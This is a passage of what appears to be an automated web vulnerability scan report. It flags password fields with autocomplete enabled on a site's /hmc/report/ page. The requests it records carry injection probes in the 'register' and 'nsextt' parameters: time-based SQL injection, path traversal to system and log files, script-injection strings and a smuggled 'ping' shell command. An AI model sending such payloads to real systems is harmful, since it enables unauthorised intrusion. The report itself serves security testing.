       <form name="form1" action="/hmc/report/index.cfm?register='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.127. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version%00

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=../../../../../../../../../../proc/self/version%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version%00" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.128. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?

The form contains the following password field with autocomplete enabled:

j_password

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:30 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=d8308cb242bf2b615f7a;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:39:30 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4789

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.129. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt='%22--%3e%3c/style%3e%3c/script%3e%3cscript%3enetsparker(0x000002)%3c/script%3e

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000002)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:35 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:35 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt='%22--%3e%3c/style%3e%3c/script%3e%3cscript%3enetsparker(0x000002)%3c/script%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.130. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=;ns:expression(netsparker(0x00003e));

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/?nsextt=;ns:expression(netsparker(0x00003E)); HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:49 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:49 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=;ns:expression(netsparker(0x00003e));" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.131. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=(select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)%20from%20DUAL)

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=(select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)%20from%20DUAL) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=(select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)%20from%20DUAL)" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.132. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='%3BSELECT%20pg_sleep(25)--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register='%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:07 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.133. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1+OR+X%3d'ss

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=1+OR+X%3d'ss HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1+OR+X%3d'ss" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.134. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27));WAITFOR%20DELAY%20%270:0:25%27--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%27));WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27));WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.135. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=%3c/a%20style=x:expre/**/ssion(netsparker(0x00003a))%3e

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/?nsextt=%3C/a%20style=x:expre/**/ssion(netsparker(0x00003A))%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:49 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:49 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=%3c/a%20style=x:expre/**/ssion(netsparker(0x00003a))%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.136. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=(SELECT%20CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97)))

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=(SELECT%20CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=(SELECT%20CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97)))" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.137. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../windows/iis6.log

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=../../../../../../../../../../windows/iis6.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../windows/iis6.log" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.138. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.139. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache/error.log

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=../../../../../../../../../../var/log/apache/error.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache/error.log" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.140. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL))) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.141. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt='%3e%3cnet%20sparker=netsparker(0x000025)%3e

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/?nsextt='%3E%3Cnet%20sparker=netsparker(0x000025)%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt='%3e%3cnet%20sparker=netsparker(0x000025)%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.142. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%26%20ping%20-n%2026%20127.0.0.1%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%26%20ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.143. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='+OR+'ns'%3d'ns

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register='+OR+'ns'%3d'ns HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
